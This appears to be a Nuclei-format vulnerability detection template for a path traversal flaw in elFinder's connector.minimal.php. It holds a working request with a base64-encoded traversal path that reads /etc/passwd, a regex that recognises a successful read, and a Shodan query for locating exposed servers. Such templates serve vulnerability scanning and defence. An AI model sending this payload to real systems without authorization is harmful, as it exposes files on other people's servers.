id: elFinder-path-traversal

info:
  name: elFinder - Path Traversal
  author: ritikchaddha
  severity: high
  description: |
    Connector.minimal.php in std42 elFinder through 2.1.12 is affected by path traversal. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
  reference:
    - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
  metadata:
    verified: true
    shodan-query: title:"elfinder"
  tags: lfi,elfinder

requests:
  - raw:
      - |
        GET /php/connector.minimal.php?cmd=file&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk&download=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200